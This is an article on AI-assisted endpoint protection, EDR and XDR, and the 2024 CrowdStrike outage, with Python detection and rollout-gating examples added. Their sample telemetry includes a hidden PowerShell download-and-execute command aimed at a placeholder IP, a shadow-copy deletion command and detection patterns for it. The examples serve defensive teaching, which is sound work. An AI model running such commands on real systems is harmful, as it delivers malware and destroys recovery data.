The question around who needs protection has shifted. Where the focus was once the perimeter, it quickly changed to the user and then, with the rise of remote work, wherever that user happened to be. It’s usually the end-user who is unintentionally facilitating a cyberattack – and it happens quickly. Verizon’s 2024 data breach investigations report found that the median time to click on a malicious link after the email is opened is 21 seconds, and then it takes only another 28 seconds to enter the data. That means it takes a user less than a minute to fall for a phishing email.
The good news is that AI is already being used by organisations to enhance threat detection. Instead of administrators manually running security tasks, much can be automated with AI algorithms and machine learning models. AI-driven endpoint security can block malicious activities before they cause harm, process large amounts of data to identify potential threats and adapt to emerging threats. This results in a more comprehensive and adaptive defence compared to traditional solutions, says Armand Kruger, head of cybersecurity at NEC XON.
An adaptive endpoint security framework plays a key role in a business’ security posture, and Shayimamba Conco, a workplace solutions architect at Check Point Software Technologies, says that integrating AI and machine learning (ML) capabilities makes an organisation’s systems more adaptive and efficient. Signature matching is still the first layer: if an endpoint security or antivirus solution recognises the signature of a known virus or malware sample, for example, it can block the file before it executes.
“While the coding of malware can be changed to get it past the solution undetected, its action remains the same,” says Gert Janzen, a product manager at Seacom. In the CIA (confidentiality, integrity and availability) triad – the three fundamental bases of information security – AI can help to safeguard the integrity and confidentiality of data by ensuring it’s kept intact and away from prying eyes. “[It] can also be used to reduce the number of false positives and reduce alert fatigue,” says Janzen.
“Most organisations have moved beyond antivirus software to comprehensive endpoint protection platforms,” he adds. “These offer preventive security for endpoints, while endpoint detection and response (EDR) solutions can provide real-time monitoring capabilities.”
Protection and detection
Sophos’ 2024 threat report shows that unprotected devices connected to organisations’ networks – including unmanaged computers without security software installed, improperly configured computers and systems running outdated software – are a primary point of entry for all types of cybercrime attacks on small businesses. Endpoint protection platforms, with EDR layered on top of them, give organisations comprehensive endpoint protection: malware detection, ransomware prevention and endpoint hardening on the preventive side, and the telemetry needed to investigate whatever prevention missed on the detection side.
“Companies need to constantly monitor, measure and improve,” says Janzen. “If your endpoint is lost, if you cannot connect to your network, how do you get that data back?” EDR also enables threat-hunting activities. Security analysts can use EDR tools to search for indicators of compromise, investigate suspicious behaviour and preemptively neutralise threats before they escalate.
Visibility means rapid incident response
Traditional antivirus software is no longer sufficient for combating the sophisticated tactics employed by modern cybercriminals. EDR solutions offer granular visibility into endpoint activity, allowing security teams to monitor process execution, file modifications, network connections and user behaviour in real time. This visibility is essential for identifying anomalous behaviour indicative of a security breach.
“Organisations don’t know what they don’t know,” says Janzen. EDR solutions utilise advanced techniques such as behavioural analysis, machine learning and threat intelligence to detect previously unseen threats and zero-day attacks. In the event of a security incident, time is of the essence. EDR provides organisations with the capability to quickly investigate and respond to potential threats, minimising the impact of breaches and reducing dwell time, the time between an attacker’s initial compromise and its detection. “There is no silver bullet for endpoint protection, so organisations need to have disaster recovery and incident response plans in place,” says Janzen.
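Janzen’s point that a sample’s code can change while “its action remains the same”, and the behavioural analysis EDR relies on, can be made concrete. The Python below is an added example written for this article, not code from any vendor’s product: it applies two behavioural rules to a constructed stream of endpoint telemetry (a process renaming many files to a new extension inside a short window, and a process deleting volume shadow copies) and escalates when both fire on one host. Neither rule looks at the binary’s hash or contents, so it does not matter that the executable is unknown. The event schema, thresholds and sample events are all assumptions made for the illustration.

```python
"""Behavioural ransomware detection over endpoint telemetry (illustrative, not vendor code)."""
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    ts: float     # seconds, relative (constructed values)
    host: str
    pid: int
    image: str    # process image path
    kind: str     # "file_rename" | "process_create" | "net_connect"
    detail: str   # "old_path->new_path" for renames, command line for process_create


# Tuning values assumed for this illustration; a real deployment tunes them per fleet.
RENAME_THRESHOLD = 20       # extension-changing renames by one process...
RENAME_WINDOW = 10.0        # ...within this many seconds
CORRELATION_WINDOW = 60.0   # two distinct signals on one host within this window escalate


def _ext(path):
    name = path.rsplit("\\", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def _changes_extension(detail):
    old, _, new = detail.partition("->")
    return _ext(old) != _ext(new)


def _deletes_shadow_copies(cmdline):
    c = cmdline.lower()
    return ("vssadmin" in c and "delete" in c and "shadows" in c) or \
           ("wmic" in c and "shadowcopy" in c and "delete" in c)


def detect(events):
    """Return alerts for a stream of events sorted by ts. Rules key on behaviour, not on the binary."""
    renames = defaultdict(deque)   # (host, pid) -> timestamps of recent extension-changing renames
    fired = set()                  # (host, pid, rule): each rule fires once per process
    first_hit = {}                 # (host, rule) -> ts of first hit, for host-level correlation
    alerts = []

    def raise_alert(ev, rule, severity, pid):
        key = (ev.host, pid, rule)
        if key in fired:
            return
        fired.add(key)
        first_hit.setdefault((ev.host, rule), ev.ts)
        alerts.append({"ts": ev.ts, "host": ev.host, "pid": pid, "image": ev.image,
                       "rule": rule, "severity": severity})

    for ev in events:
        if ev.kind == "file_rename" and _changes_extension(ev.detail):
            q = renames[(ev.host, ev.pid)]
            q.append(ev.ts)
            while q and ev.ts - q[0] > RENAME_WINDOW:
                q.popleft()
            if len(q) >= RENAME_THRESHOLD:
                raise_alert(ev, "mass_rename", "medium", ev.pid)
        elif ev.kind == "process_create" and _deletes_shadow_copies(ev.detail):
            raise_alert(ev, "shadow_copy_deletion", "medium", ev.pid)

        # Two independent medium signals on the same host inside the window: escalate once per host.
        a = first_hit.get((ev.host, "mass_rename"))
        b = first_hit.get((ev.host, "shadow_copy_deletion"))
        if a is not None and b is not None and abs(a - b) <= CORRELATION_WINDOW:
            raise_alert(ev, "ransomware_behaviour", "high", None)
    return alerts


def sample_events():
    """Constructed telemetry: a benign build job, then an unknown binary behaving like ransomware."""
    build = "C:\\Program Files\\MSBuild\\MSBuild.exe"
    unknown = "C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe"
    ev = []
    for i in range(5):  # compiler output changes extensions too, but only five times
        ev.append(Event(1.0 + i, "WS-01", 4321, build, "file_rename",
                        f"C:\\build\\obj{i}.tmp->C:\\build\\obj{i}.obj"))
    ev.append(Event(50.0, "WS-01", 4321, build, "net_connect", "10.0.0.5:443"))
    for i in range(25):  # 25 documents renamed to .locked in 2.5 seconds
        ev.append(Event(100.0 + i * 0.1, "WS-01", 9001, unknown, "file_rename",
                        f"C:\\Users\\bob\\Documents\\report{i}.docx->"
                        f"C:\\Users\\bob\\Documents\\report{i}.docx.locked"))
    ev.append(Event(103.0, "WS-01", 9002, "C:\\Windows\\System32\\vssadmin.exe", "process_create",
                    "vssadmin.exe delete shadows /all /quiet"))
    return sorted(ev, key=lambda e: e.ts)


if __name__ == "__main__":
    for a in detect(sample_events()):
        print(a)
```

The build process trips the same extension-change logic but never reaches the threshold, which is the usual trade-off with behavioural rules: the window and count decide the false-positive rate, and the escalation to “high” only happens when two unrelated signals coincide on one host.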
With endpoint security, quick detection is critical. But it’s not only about preventing or mitigating cyber threats; many industries are subject to governance and compliance requirements around data protection and breach notification. With ransomware, rapid response times go hand-in-hand with meeting reporting requirements to avoid penalties. “You need an endpoint solution that will be able to prevent your data not only being encrypted, but also being stolen or infiltrated,” says Conco.
Complex threats
This is one of the reasons EDR is transitioning into XDR – extended detection and response. While EDR solutions provide granular visibility, XDR takes a broader approach. Data doesn’t only come in from endpoints, but also from networks, cloud services, email security systems and identity management solutions. By integrating data from these sources and layers, XDR can identify complex threats that might go unnoticed by standalone security tools. “EDR focuses on the endpoint, but businesses have data sitting in the cloud and other places. You need to ensure that all these are correlated into one platform,” says Conco. Although the entry point for attacks is often an endpoint, once a cybercriminal gains access, they will explore the network and exploit other vulnerable systems, elevate privileges and potentially gain access to critical data or systems, something that Conco likens to an onion. “XDR ensures that if ever one of the layers is bypassed by a threat actor, there will always be another layer in place.”
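A minimal version of the correlation Conco describes, as an added example written for this article rather than taken from any XDR product: four constructed log extracts (email gateway, endpoint, identity provider, cloud storage), each in its own assumed schema, are normalised onto a shared entity, the user, and chained in attack-stage order inside a time window. Each signal is weak on its own; only the chain across layers produces an incident. The schemas, thresholds, account mapping and sample records are assumptions made for the illustration.

```python
"""Cross-source correlation in the XDR style (illustrative, not any product's logic)."""
from dataclasses import dataclass
from datetime import datetime, timedelta

STAGE_ORDER = ["delivery", "execution", "privilege", "collection"]
WINDOW = timedelta(hours=24)   # assumed: how long one intrusion may span for correlation
MIN_STAGES = 3                 # assumed: signals from this many ordered stages make an incident

# Constructed records, each in the shape its own tool might emit (schemas are assumptions).
EMAIL_LOG = [
    {"time": "2024-09-02T08:01:10Z", "recipient": "bob@example.com", "verdict": "delivered",
     "url_category": "newly_registered"},
    {"time": "2024-09-02T08:02:05Z", "recipient": "alice@example.com", "verdict": "quarantined",
     "url_category": "phishing"},
]
ENDPOINT_LOG = [
    {"time": "2024-09-02T08:03:40Z", "host": "WS-01", "user": "EXAMPLE\\bob", "parent": "WINWORD.EXE",
     "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c IEX((New-Object Net.WebClient)"
                ".DownloadString('http://198.51.100.7/a'))"},
]
IDENTITY_LOG = [
    {"time": "2024-09-02T09:15:00Z", "actor": "bob@example.com", "action": "AddMemberToRole",
     "target": "Global Administrator"},
    {"time": "2024-09-02T09:16:30Z", "actor": "alice@example.com", "action": "UserLoginFailed",
     "target": "-"},
]
CLOUD_LOG = [
    {"time": "2024-09-02T09:40:00Z", "principal": "bob@example.com", "op": "GetBlob",
     "container": "finance-reports", "count": 4200},
    {"time": "2024-09-02T02:00:00Z", "principal": "svc-backup@example.com", "op": "GetBlob",
     "container": "finance-reports", "count": 9800},
]
# Assumed mapping from on-premises account names to cloud identities (normally from the directory).
ACCOUNT_MAP = {"EXAMPLE\\bob": "bob@example.com", "EXAMPLE\\alice": "alice@example.com"}


@dataclass(frozen=True)
class Signal:
    ts: datetime
    source: str
    user: str
    stage: str
    summary: str


def _ts(s):
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


# One adapter per source: normalise the tool's schema to a Signal on the shared entity (the user).
def from_email(r):
    if r["verdict"] == "delivered" and r["url_category"] in ("newly_registered", "phishing"):
        return Signal(_ts(r["time"]), "email", r["recipient"], "delivery",
                      f"mail with {r['url_category']} link delivered")


def from_endpoint(r):
    if r["parent"].upper() in {"WINWORD.EXE", "EXCEL.EXE", "OUTLOOK.EXE"} and \
            r["image"].lower() in {"powershell.exe", "cmd.exe", "wscript.exe"}:
        return Signal(_ts(r["time"]), "endpoint", ACCOUNT_MAP.get(r["user"], r["user"]), "execution",
                      f"{r['parent']} spawned {r['image']} on {r['host']}")


def from_identity(r):
    if r["action"] == "AddMemberToRole" and "admin" in r["target"].lower():
        return Signal(_ts(r["time"]), "identity", r["actor"], "privilege",
                      f"{r['actor']} added to role {r['target']}")


def from_cloud(r):
    if r["op"] == "GetBlob" and r["count"] >= 1000:
        return Signal(_ts(r["time"]), "cloud", r["principal"], "collection",
                      f"{r['count']} object reads from {r['container']}")


def ingest():
    sources = [(EMAIL_LOG, from_email), (ENDPOINT_LOG, from_endpoint),
               (IDENTITY_LOG, from_identity), (CLOUD_LOG, from_cloud)]
    return [sig for log, adapter in sources for rec in log if (sig := adapter(rec)) is not None]


def correlate(signals):
    """Chain signals per user that advance through STAGE_ORDER inside WINDOW."""
    by_user = {}
    for s in sorted(signals, key=lambda s: s.ts):
        by_user.setdefault(s.user, []).append(s)
    incidents = []
    for user, sigs in by_user.items():
        for i, first in enumerate(sigs):
            chain = [first]
            for s in sigs[i + 1:]:
                if s.ts - first.ts > WINDOW:
                    break
                if STAGE_ORDER.index(s.stage) > STAGE_ORDER.index(chain[-1].stage):
                    chain.append(s)
            if len(chain) >= MIN_STAGES:
                incidents.append({"user": user, "stages": [c.stage for c in chain],
                                  "sources": [c.source for c in chain],
                                  "timeline": [f"{c.ts:%H:%M} {c.summary}" for c in chain]})
                break   # one incident per user per window is enough for the illustration
    return incidents


if __name__ == "__main__":
    for inc in correlate(ingest()):
        print(inc)
```

The backup service account’s bulk reads and the quarantined phishing mail for the second user each produce at most one signal and never an incident; the value is in the join on the user across the email, endpoint, identity and cloud layers, which no single one of those tools can make on its own.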
CROWDSTRIKE’S BLUE SCREEN OF DEATH AT THE ENDPOINT
On July 19, 2024, CrowdStrike, a provider of endpoint protection software, released an update that caused catastrophic failures on Windows computers worldwide; Microsoft put the number of affected devices at about 8.5 million. The update was not a new driver. It was a content file (Channel File 291) for the Falcon sensor’s existing kernel-mode driver, csagent.sys, which is registered as a file system filter driver and marked to load at boot. The template type the file used declared 21 input fields, but the sensor code supplied only 20, and a new rule in the file matched on the 21st; the driver’s content interpreter read past the end of its input, and the resulting kernel page fault produced the PAGE_FAULT_IN_NONPAGED_AREA blue screen. Because the driver loads at boot, affected machines crashed again on every restart and had to be recovered by hand, typically by booting into safe mode or the recovery environment and deleting the offending file.
The incident serves as a cautionary tale in the field of endpoint security. Third-party endpoint protection solutions must integrate deeply with the operating system to perform their functions: they load kernel-mode drivers that intercept file system, process and registry activity, and those drivers run with the same privilege as the kernel itself, so a fault in one of them takes down the whole machine rather than a single process. Such software is generally written in C or C++ to work at that level, and those languages leave memory-safety errors to the programmer to prevent; the CrowdStrike crash was an out-of-bounds read of this kind, not the null-pointer dereference that was widely reported at the time. Reliance on undocumented or unsupported Windows interfaces complicates matters further, as those interactions are less predictable and harder to secure.
OS vendors, such as Microsoft, provide native security solutions like Windows Defender. Defender is not free of kernel-mode code either (its file system minifilter, WdFilter.sys, is a driver in the same sense), but it is designed, tested and serviced by the vendor that builds the kernel it runs in, which reduces the chance that a change on one side breaks the other. The practical lesson is therefore less about who writes the driver than about how changes reach it: a kernel-mode agent that accepts frequent content updates needs bounds checks on everything it parses, a staged rollout for that content as well as for its code, and a way for customers to control when they receive it. CrowdStrike’s own post-incident review committed to each of these.
The CrowdStrike incident highlights the importance of best practices in software deployment. Releasing critical updates late in the working week, as CrowdStrike did, leaves little time for addressing potential issues. “Avoiding this situation should have been straightforward,” said a Kaspersky blog. “First, the update shouldn’t have been released on a Friday. This is as per a rule that’s been known to all in the industry since the year dot: if an error occurs, there’s too little time to fix it before the weekend, so the system administrators at all companies affected need to work over the weekend to fix things.” Thorough testing and careful planning of update deployment are also essential to avoid widespread disruptions. “It’s necessary to check software updates on test infrastructure for operability and errors before rolling them out to the company’s ‘combat’ infrastructure and to implement changes gradually – continually monitoring for possible failures,” added Kaspersky.
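The two practices above, validating what a privileged component will consume and rolling changes out gradually while watching for failures, can be shown as a small release gate. The Python below is an added example written for this article; it is not CrowdStrike’s, Kaspersky’s or any vendor’s pipeline. The ring names, failure threshold, change-window rule, template and content layout, and the crash telemetry are all assumptions constructed for the illustration; in production the health figures would come from sensor heartbeat and crash reporting.

```python
"""Pre-deployment validation and a ring-gated rollout for endpoint content updates (illustrative)."""
from datetime import datetime

RINGS = ("lab", "canary", "early", "broad", "all")   # ring names assumed for this illustration
MAX_FAILURE_RATE = 0.005   # assumed gate: more than 0.5% of a ring's hosts failing halts the rollout
NO_START_DAYS = {4, 5, 6}  # Friday, Saturday, Sunday in datetime.weekday() numbering
MONDAY = datetime(2024, 7, 22)   # constructed start times for the scenarios below
FRIDAY = datetime(2024, 7, 19)

# A template describes the record layout the consuming code was built for (assumed structure).
TEMPLATE = {"name": "example-template", "field_count": 20}
GOOD_UPDATE = {"name": "update-A", "entries": [["f"] * 20 for _ in range(3)]}
BAD_SCHEMA_UPDATE = {"name": "update-B", "entries": [["f"] * 20, ["f"] * 21, ["f"] * 20]}


def validate_content(update, template):
    """Refuse content whose entries do not carry exactly the field count the template declares.

    A disagreement over field counts was the class of defect behind the July 2024 outage: one
    side declared one more field than the other supplied, and new content that referenced it
    made the interpreter read past the end of its input. Checking the counts agree before the
    content reaches kernel-mode code turns a crash into a rejected build.
    """
    return [f"entry {i}: {len(e)} fields, template expects {template['field_count']}"
            for i, e in enumerate(update["entries"]) if len(e) != template["field_count"]]


def rollout(update, template, health, start_time):
    """Advance the update through RINGS, stopping at the first gate that fails.

    `health(ring)` returns (hosts_updated, hosts_failed) observed after the ring's soak period;
    in production that comes from sensor heartbeat and crash telemetry.
    """
    record = {"update": update["name"], "reached": [], "halted_at": None, "reason": None}
    problems = validate_content(update, template)
    if problems:
        record["reason"] = "validation: " + "; ".join(problems)
        return record
    if start_time.weekday() in NO_START_DAYS:
        record["reason"] = "outside change window: no rollouts started on or before a weekend"
        return record
    for ring in RINGS:
        deployed, failed = health(ring)
        record["reached"].append(ring)
        rate = failed / deployed if deployed else 0.0
        if rate > MAX_FAILURE_RATE:
            record["halted_at"] = ring
            record["reason"] = f"{ring}: {failed}/{deployed} hosts failed ({rate:.1%}), rollout halted"
            return record
    record["reason"] = "completed"
    return record


def simulated_health(crash_rates):
    """Constructed telemetry: per-ring crash fraction for a scenario; ring sizes are assumed."""
    sizes = {"lab": 50, "canary": 500, "early": 5_000, "broad": 50_000, "all": 500_000}

    def health(ring):
        deployed = sizes[ring]
        return deployed, int(deployed * crash_rates.get(ring, 0.0))
    return health


if __name__ == "__main__":
    print(rollout(BAD_SCHEMA_UPDATE, TEMPLATE, simulated_health({}), MONDAY))
    # Content that passes validation but crashes the canary ring: halted before "early".
    print(rollout(GOOD_UPDATE, TEMPLATE, simulated_health({"canary": 1.0}), MONDAY))
    print(rollout(GOOD_UPDATE, TEMPLATE, simulated_health({"canary": 0.001}), MONDAY))
    print(rollout(GOOD_UPDATE, TEMPLATE, simulated_health({}), FRIDAY))
```

The second scenario is the important one: content that is well-formed can still crash hosts for reasons the validator cannot see, which is why the telemetry gate sits after every ring and why the “lab” ring alone is not enough. The change-window check is the simplest possible encoding of the “not on a Friday” rule quoted above; real schedules also exclude holidays and freeze periods.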
* Article first published on brainstorm.itweb.co.za